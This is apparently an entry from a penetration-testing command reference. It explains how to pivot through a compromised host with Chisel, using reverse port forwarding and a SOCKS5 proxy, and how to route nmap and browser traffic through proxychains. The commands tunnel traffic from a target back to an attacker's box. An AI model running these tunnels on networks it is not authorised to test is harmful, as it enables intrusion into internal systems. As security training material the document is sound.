← Back to search

Pivot with Chisel (Reverse Port Forward & SOCKS)

Pivoting & Transfertool

Summary

Uses Chisel to tunnel a single port back over a reverse connection, or to set up a SOCKS5 proxy for routing tools through a compromised host via proxychains.

Walkthrough

Chisel tunnels traffic through a compromised host. Run the server on your attacker box and the client on the target. --reverse lets the client open listeners on the server side.

Single reverse port forward

Forward a target-internal service (e.g. MySQL on 3306) back to your attacker box:

``bash ./chisel server -p 8000 --reverse ./chisel client <IP>:8000 R:3306:127.0.0.1:3306 ``

SOCKS5 proxy for full network access

Start the server with --socks5 and connect the client with R:socks5:

``bash chisel server -p 8081 --reverse --socks5 ./chisel client <IP>:8081 R:socks5 ``

Route tools through the proxy

  1. Make sure /etc/proxychains4.conf ends with the SOCKS5 entry (default Chisel SOCKS port is 1080):

``bash socks5 127.0.0.1 1080 ``

  1. Prefix any command with proxychains to send it through the tunnel:

``bash proxychains -q nmap -sT <IP> -p- -Pn -v ``

  1. For browser access, set the browser's proxy to SOCKS5 — localhost : 1080.

Commands

bash

./chisel server -p 8000 --reverse
./chisel client <IP>:8000 R:3306:127.0.0.1:3306

bash

chisel server -p 8081 --reverse --socks5
./chisel client <IP>:8081 R:socks5

bash

proxychains -q nmap -sT <IP> -p- -Pn -v